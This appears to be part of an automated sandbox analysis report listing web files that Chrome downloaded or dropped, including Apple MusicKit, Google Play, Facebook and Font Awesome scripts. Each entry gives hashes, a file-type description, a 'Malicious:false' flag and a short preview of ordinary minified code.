                                                                                                                                                                                                                                  Preview:(function(mt){typeof define=="function"&&define.amd?define(mt):mt()})(function(){"use strict";function mt(e,t){return t.forEach(function(s){s&&typeof s!="string"&&!Array.isArray(s)&&Object.keys(s).forEach(function(n){if(n!=="default"&&!(n in e)){var a=Object.getOwnPropertyDescriptor(s,n);Object.defineProperty(e,n,a.get?a:{enumerable:!0,get:function(){return s[n]}})}})}),Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Ye,M,ss,ns,Je,is,as,dt={},os=[],Pn=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function we(e,t){for(var s in t)e[s]=t[s];return e}function rs(e){var t=e.parentNode;t&&t.removeChild(e)}function Xe(e,t,s){var n,a,i,l={};for(i in t)i=="key"?n=t[i]:i=="ref"?a=t[i]:l[i]=t[i];if(arguments.length>2&&(l.children=arguments.length>3?Ye.call(arguments,2):s),typeof e=="function"&&e.defaultProps!=null)for(i in e.defaultProps)l[i]===void 0&&(l[i]=e.defaultProps[i]);return et(e,l,n,a,null)}function et(e,t,s,n,a){var i={type:e,props:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3245
                                                                                                                                                                                                                                  Entropy (8bit):5.348177629215205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:upnlrpevhTuAG9T+ojsBSBY7p0aCW1//H/71LJBMLEvgj+CCMSmvygNscKApaWv+:upnlruLeTdjBBYtPdfrpijC8vyepaTd
                                                                                                                                                                                                                                  MD5:706B93A70D825C3906B9080E0C5924E8
                                                                                                                                                                                                                                  SHA1:BA10D0661DF8C6762D99871F7168C2C729841592
                                                                                                                                                                                                                                  SHA-256:7C784877F18CDFF0C5F948BF11E89475E272EDB8A9130C5518B3EB71DDC74781
                                                                                                                                                                                                                                  SHA-512:9AD813150AD90DA8CBAB1A70C56F35130BD3F49F5A3A3372BF7B37ECD9444EA367FA7EBC4E70030843D913CD74665B6DB4F33FA1A2288222344FD9230B684007
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n,a as t}from"./p-2649b6ee.js";var o=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default="undefined"!=typeof FastBoot?FastBoot.require("buffer").Buffer:"undefined"!=typeof process&&null!==process.versions&&null!==process.versions.node?Buffer:window.Buffer})),e=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.memoize=void 0,t.memoize=function(n){return function(...t){let o="",e=t.length;for(n._memoi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (483)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1087
                                                                                                                                                                                                                                  Entropy (8bit):5.352210071736905
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kzLxmQYxSh3yCm4qqPeJWKiAaLbQ+LJwsqoWRNEVKGXiQrl:kLx7wWqoKicoYQrl
                                                                                                                                                                                                                                  MD5:0FAB566A83B069AEBD7D93E9671A98D9
                                                                                                                                                                                                                                  SHA1:777C64DF33985882A98568CFCCF6F442429B8B46
                                                                                                                                                                                                                                  SHA-256:46B9A1F60B1FD7AA41438194D15C74A169F0DB4C1AD1FEC324046052981C8B0E
                                                                                                                                                                                                                                  SHA-512:67CDAE9BDECFF0A5D8A593176E48A3D08BB88E7C4257A526A9C28F6D0BAFD594A9C14766018EA91E4E17F7FDD19AC45687B2659485D71B93F856FBD8389FF275
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("hBmIab");.var bYc,dYc,eYc,cYc;bYc=function(a){if(a=_.Xe(a,b=>!!b.attributes&&!!b.attributes.getNamedItem("c-wiz")))return _.Yk(a)};_.G7=function({cs:a,Ob:b,Wr:c,mb:d}){return new cYc({cs:a,Ob:b,Wr:c,mb:d})};dYc=function(a){return _.lr(a.N).then(b=>(b.Wd||b.CA||b.BA).Bb().vc())};eYc=function(a){const b=_.er(bYc(a.H)).find(c=>c.mb.Ex===a.V).ub.clone();return c=>{b.xc().Xb().ym().Fg(c.gp());return a.Pm.Eb(b)}};_.H7=function(a){dYc(a).then(b=>{_.ff(a.H,_.WXc,{Vk:b,zo:eYc(a),GV:c=>c.Bb()})})};.cYc=class{constructor({cs:a,Ob:b,Wr:c,mb:d}){this.H=a;this.N=b;this.V=c;this.Pm=d}};._.w();._.yCa=_.B("CvxVpd",[_.vk]);._.u("CvxVpd");.var kYc=class extends _.ys{static Ia(){return{model:{component:_.nr}}}constructor(a){super(a.ta);this.H=a.model.component}N(){_.H7(_.G7({cs:this.ma().el(),Ob:this.H,Wr:_.yD,mb:_.pUa}))}};_.V(kYc.prototype,"eiLb1d",function(){return this.N});_.Gs(_.yCa,kYc);._.w();
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (52282)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):103009
                                                                                                                                                                                                                                  Entropy (8bit):4.782008653752139
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:t1MCMPMCMjMCM4MCMwMCM3sVM3709gbQZMfjSFOlyPG9dXgRM0J:W709gUGGFwyPG9dwRM0J
                                                                                                                                                                                                                                  MD5:C325BE79A5ECCA85D68EB9E5B65A547A
                                                                                                                                                                                                                                  SHA1:F2A96686228994A46961657DF4C9405AFEC8E9C2
                                                                                                                                                                                                                                  SHA-256:5CEAABA22D75B58E04150311F596306562A3E595E27ED4B1DFA451B82DDA9E50
                                                                                                                                                                                                                                  SHA-512:4A71F958AF9B67180F1ECE38B96217F8B2C9009F7FD8F90F299E508808FA4DAF3AC3E7EC6F64E47267D1C955F7A419CC15C57BA103C9925F507AF4825ABDD6E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
                                                                                                                                                                                                                                  Preview:/*!. * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):582
                                                                                                                                                                                                                                  Entropy (8bit):5.204232886763647
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:zXJnCMA7Qx+6oFACVQPI4RoJLQPIYKcAaZq9VsxI0LWYcNq50SfnUwLQg5jQW:LRCMxVqF6PIHkPIY2eq9VsCyWROUwLQe
                                                                                                                                                                                                                                  MD5:A57F69DD143794030B4FAB18E1F76810
                                                                                                                                                                                                                                  SHA1:851B709612FC28473A8F3A85EB769207D01C025B
                                                                                                                                                                                                                                  SHA-256:4F591A9B5C7C1C49F52DBF405E39B5305C28DA1D4E607B50DD118FEE3635A599
                                                                                                                                                                                                                                  SHA-512:FF46BD59AE8511E93855E656EF7D6B74DDD8F83EA2A0B72381B9962ED9835624F1AEF111A0A898BFDA3D85CF41A6BD74F095D13C1DE98E1E6A2E3341B50AD857
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/GcgopRl4mBW.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsDataAtomDebugger",["URI"],(function(a,b,c,d,e,f){"use strict";var g,h={shouldLog:!!new(g||b("URI"))(window.location.href).getQueryData().dispatcherevents,toggleLogging:function(){h.shouldLog=!h.shouldLog},isLogging:function(){return h.shouldLog},attach:function(a){a.register(function(a){a=a.action;if(a){console.timeStamp&&console.timeStamp(a.type);if(h.shouldLog){var b=a.type,c=a.actionType;a=babelHelpers.objectWithoutPropertiesLoose(a,["type","actionType"]);console.groupCollapsed(b||c,a);console.trace();console.groupEnd()}}})}};e.exports=h}),null);
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (4739)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6156
                                                                                                                                                                                                                                  Entropy (8bit):5.35625511599146
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XmZ9kbptGzE4rTGqlBV5l5/IiNSZ1HPyy0KjEL2VcI:XmZ9kbGzEG5lBVL+iI2yljg6cI
                                                                                                                                                                                                                                  MD5:C4CD29E090B8BB37F44EAE73DCFB0ABC
                                                                                                                                                                                                                                  SHA1:6440CEF9A4CCD7198FCD669F775FAE65B52E63CD
                                                                                                                                                                                                                                  SHA-256:1AF4A64548B3003042221EE0B21D889FD6420CCF1A981A1122DEE5FACE97E4B3
                                                                                                                                                                                                                                  SHA-512:0363DAA966E9D41C9235C67C13C261BE41C3C5D513838CF328824F84385C1B5D3FEFCF54EA8E3FD9BAF9E1A48B671F15090D51089F6561E471B85549724ED446
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return this.root};c.beginUpdate=function(){if(this.updating)return!1;this.updating=!0;return!0};c.endUpdate=function(){this.updating=!1};c.update=function(a){if(!this.beginUpdate())return this;this.onupdate(a);this.endUpdate()};c.onupdate=function(a){};a.getInstance=function(a){return b("DataStore").get(a,"DOMControl")};return a}();e.exports=a}),null);.__d("Input",["CSS","DOMControl","DOMQuery"],(function(a,b,c,d,e,f,g){function h(a){return!/\S/.test(a||"")}function i(a){return h(a.value)}function a(a){return i(a)?"":a.value}function b(a){return a.value}function e(a,b){a.value=b||"";b=c("DOMControl").getInstance(a);b&&b.resetHeight&&b.resetHeight()}function f(a,b){b||(b=""),a.setAttribute("aria-label",b),a.setAttribute("placeholder",b)}funct
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):231862
                                                                                                                                                                                                                                  Entropy (8bit):5.4580370109650715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:5fLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713hW:5fLeYc+6JaH8N7QQGArHu5s713A
                                                                                                                                                                                                                                  MD5:3E34065323CCD70417621B0687E56775
                                                                                                                                                                                                                                  SHA1:F63D803164D63317D51A708C942FF511725A9E16
                                                                                                                                                                                                                                  SHA-256:5EBCE957851EB83517851E8613F012EB45AA4EBB6142B92C30B7D9492C874E22
                                                                                                                                                                                                                                  SHA-512:EDB02D4A93A15771FB0768C8A45F3DBAF0908E5C450737D59AF5804840B10E33C0955831B4B6B3F3362A839CC8DBEF2169667F4FDFB40299FDCB80E8A16051EA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                  Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6544)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13393
                                                                                                                                                                                                                                  Entropy (8bit):5.410452822445596
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6cJVUw5yrnVinZnt250Jrxr0UYrAmKRdeiTzVl7v2Vpfd2A2Ks6DBPjbTUDwCFVW:6SnWVinZnSO355zXv2Vpfd2A2Yjn
                                                                                                                                                                                                                                  MD5:9512B522526C50D8D6A8BDFE73A720A0
                                                                                                                                                                                                                                  SHA1:0233D6921F5694C7599DAADDBFADBD65C9248068
                                                                                                                                                                                                                                  SHA-256:42264DFE70407A2AEFA31B4286D407B44DC9CAA4D61F59637908D1ECED68F595
                                                                                                                                                                                                                                  SHA-512:F3A2EEA8EA2A762106B3FCBF1562ADB93D3E68BC573EEE7BA6B6D2581B8E7C604CCF0ADBB65A7E5028BB59EB9130E07C8B11A9937A2CC968D85213229A383968
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractSearchSource",["Promise"],(function(a,b,c,d,e,f){var g;a=function(){function a(){}var c=a.prototype;c.bootstrap=function(a){var c=this;this.$1||(this.$1=new(g||(g=b("Promise")))(function(a){c.bootstrapImpl(a)}));return this.$1.then(a)};c.search=function(a,b,c){this.searchImpl(a,b,c)};c.bootstrapImpl=function(a){a()};c.searchImpl=function(a,b,c){throw new Error("Abstract method #searchImpl is not implemented.")};c.clearBootstrappedData=function(){this.$1=null};return a}();f["default"]=a}),66);.__d("ExplicitRegistrationReactDispatcher",["ExplicitRegistrationDispatcher"],(function(a,b,c,d,e,f,g){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var c=b.prototype;c.dispatch=function(b){a.prototype.dispatch.call(this,b)};return b}(c("ExplicitRegistrationDispatcher"));g["default"]=a}),98);.__d("LayoutColumn.react",["cx","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j=i||d("react");b=j.forward
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):198411
                                                                                                                                                                                                                                  Entropy (8bit):5.065312188600465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:zseLz+edA7slvyum8Dm7/2gmr5n+pIDeLlS:zseLjA4M8DzrxXWS
                                                                                                                                                                                                                                  MD5:E099811B484D21E02C4E881CD7FB8E9A
                                                                                                                                                                                                                                  SHA1:9332E9520A3CBEFFDEE8D8564F63DFE6946BF3D4
                                                                                                                                                                                                                                  SHA-256:3ECE3B9DAC2162E9AC840C38D7234927D26A817BD864EE39D80E89B430AB684B
                                                                                                                                                                                                                                  SHA-512:FBB890F1885E77F7E5F6B22755593DA50F0E4257F3CF8CA612DD5C94F8BBEC7276700CA6F7D70CA291358304BAB198B95DE27DDA98849E5C16CD16C411F7FAAF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4:2f81d1284f6352:0
                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (557)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9033
                                                                                                                                                                                                                                  Entropy (8bit):5.6676738514439275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LHY7X2gzzPUY074w4/BQDbjrqWOacA79P:zwjzz8z40DTnOacA79P
                                                                                                                                                                                                                                  MD5:A3FFC73A835CE8CBF5C1F3A2A63D98F4
                                                                                                                                                                                                                                  SHA1:5C506BCCBD3E623ACC29B783B811D546CADB1A48
                                                                                                                                                                                                                                  SHA-256:93FF4CDB8F412F7112239364E3E0B5A356FC396750A9387B0E11FDE2CC6AC2E7
                                                                                                                                                                                                                                  SHA-512:E3C55262568AE5D085D5D9E12FEFA6C7BF9F6CCDDA850276C93A576D1EE8B1BE988C94C386FCD643CD834A4B8517AB4EC66D1652CA710B546E904D040F09DCDA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.fT=function(a,b,c,d,e,f,g,h){return(0,_.P)('<span class="'+_.T("DPvwYc")+(h?" "+_.T("sm8sCf"):"")+(g?" "+_.T(g):"")+'"'+(c?' title="'+_.T(c)+'"':"")+(b?' aria-label="'+_.T(_.Ro(b))+'"':"")+((c||b)&&e?' role="'+_.T(e)+'"':"")+(c||b?"":' aria-hidden="true"')+(d?' jsname="'+_.T(d)+'"':"")+(f?_.Vo(_.Uo(f)):"")+">"+_.Q(a)+"</span>")};.var MRc,ORc,NRc;._.PRc=function(a,b){const c=a.card;var d=a.dg,e=a.Aa,f=_.P,g=a.qa,h=_.Iq(c.Fa()),k=_.P,m=_.P,n='<div class="'+_.T("Vpfmgd")+'"><div class="'+_.T("uzcko")+'">',q=_.P;e=""+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,1),_.yh(_.Z5(c),4),"yNWQ8e",_.yh(_.Y5(c),1),e.H(),_.yh(_.Z5(c),3))+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,3),_.yh(_.Z5(c),4),"ZYyTud",_.yh(_.Y5(c),3),e.H(),_.yh(_.Z5(c),3))+MRc(b,_.F(_.F(_.Z5(c),_.U5,2),_.ct,2),_.yh(_.Z5(c),4),"kJ9uy",_.yh(_.Y5(c),2),e.H(),_.yh(_.Z5(c),3));if(c?.Sg()?.N()===1){var t=.'<span class="'+_.T("VKNo5")+'">';t=(0,_.P)(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10204), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10204
                                                                                                                                                                                                                                  Entropy (8bit):5.282533445396263
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:U38kcmi3U2hQctc1cJcpcZrEccxNsMlcTctcIceCgycLcvXRkEsYNtGr:U38ZZU2hxtc1cJcpclEHllcTctcIc3gP
                                                                                                                                                                                                                                  MD5:97E3F38781BA136C719D08CA0EC5162F
                                                                                                                                                                                                                                  SHA1:5604E5C9095068500FD764E4E7608CD489D272CC
                                                                                                                                                                                                                                  SHA-256:9DC2DC3E987AC76A2AE4DCC3A4DE7BF5D09DEACD4780C9F8BA7EC263380809CF
                                                                                                                                                                                                                                  SHA-512:0716DD98795D9184A7A1508B87F9D17FAE217CC0364D42D075AF5D4C6BC1FD37E6FC07C4F6798D96AF028608075666D133C15977F38F8748421586BB9833E507
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:!function t(e,i,n){function s(o,r){if(!i[o]){if(!e[o]){var l="function"==typeof require&&require;if(!r&&l)return l(o,!0);if(a)return a(o,!0);var c=new Error("Cannot find module '"+o+"'");throw c.code="MODULE_NOT_FOUND",c}var h=i[o]={exports:{}};e[o][0].call(h.exports,(function(t){return s(e[o][1][t]||t)}),h,h.exports,t,e,i,n)}return i[o].exports}for(var a="function"==typeof require&&require,o=0;o<n.length;o++)s(n[o]);return s}({1:[function(t,e,i){"use strict";e.exports={EventEmitterMicro:t(2)}},{2:2}],2:[function(t,e,i){"use strict";function n(){this._events={}}let s=n.prototype;s.on=function(t,e){return this._events[t]=this._events[t]||[],this._events[t].unshift(e),e},s.once=function(t,e){let i=this;return this.on(t,(function n(s){i.off(t,n),void 0!==s?e(s):e()}))},s.off=function(t,e){if(!this.has(t))return;if(1===arguments.length)return this._events[t]=null,void delete this._events[t];let i=this._events[t].indexOf(e);-1!==i&&this._events[t].splice(i,1)},s.trigger=function(t,e){if(thi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):792
                                                                                                                                                                                                                                  Entropy (8bit):5.189921816893456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:kRZTFMTfoI/AIwiAoNoaI/AI+2ikyYxCI/AIoAnTiIdGmnYmeI/AI1iCkbRN20:kzeTJ9k0Rkym3eCn9H+Lrl
                                                                                                                                                                                                                                  MD5:2D8C88CF94F4EA146D2F6A46DC2325D6
                                                                                                                                                                                                                                  SHA1:CDFAD9BACE4AAF22AD609B7AD29B0E24F18D17A2
                                                                                                                                                                                                                                  SHA-256:5BCFF5FE1BCAE24618E4B06D541BF983F922A7EC7FCD1280A32AF5A4CEDA6426
                                                                                                                                                                                                                                  SHA-512:156B4F8559958E635519DAA3F5913B5B316242D0C5C8CDB9D71E688383BE11B00692C6126D4EA1DC4C19289B2084418E5DB0D25AFC835787DBC5BE8BF2485214
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,GkRiKb,HnDLGf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=yNB6me,qqarmf,FuzVxc,I8lFqf"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("yNB6me");._.qr(_.NCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"yNB6me"}N(){return!0}Xa(){return _.ecc}});_.$q.yNB6me=_.jcc;._.w();._.u("qqarmf");._.qr(_.yDa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qqarmf"}N(){return!0}Xa(){return _.Hdc}});_.$q.qqarmf=_.Lfc;._.w();._.u("FuzVxc");._.qr(_.ADa,class extends _.rr{constructor(a){super(a.ta)}H(){return"FuzVxc"}N(){return!0}Xa(){return _.hgc}});_.$q.FuzVxc=_.kgc;._.w();._.u("I8lFqf");._.qr(_.DDa,class extends _.rr{constructor(a){super(a.ta)}H(){return"I8lFqf"}N(){return!0}Xa(){return _.ngc}});_.$q.I8lFqf=_.pgc;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2256)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2800
                                                                                                                                                                                                                                  Entropy (8bit):5.166987020827454
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:upnlrpevhTuAG9tXDMTEkxseaD2ND+gJ7T7+J3SWDWCSSAUNZIoz6hpysy7K4Cf:upnlruLetzMoys/Dg63SF8vOhpysy7K9
                                                                                                                                                                                                                                  MD5:2B00E754EC8A552398780F9E970D000C
                                                                                                                                                                                                                                  SHA1:D6334FD54EF4F18B69806AAAC7A59A40D61D4565
                                                                                                                                                                                                                                  SHA-256:21D51189776F6200F998912EB4FEA70F9B8A48EF2DC37FDFDFAD6E1511E7F463
                                                                                                                                                                                                                                  SHA-512:77E6D0C809DBDCA3E23736E3F6B26E64C8EDE4F9426C36EFA3C06F96C47DB2C5E30EDA52B02714791EF2937CB5092949750916D07563428C92DD11D22101F10A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-bb5da73d.js
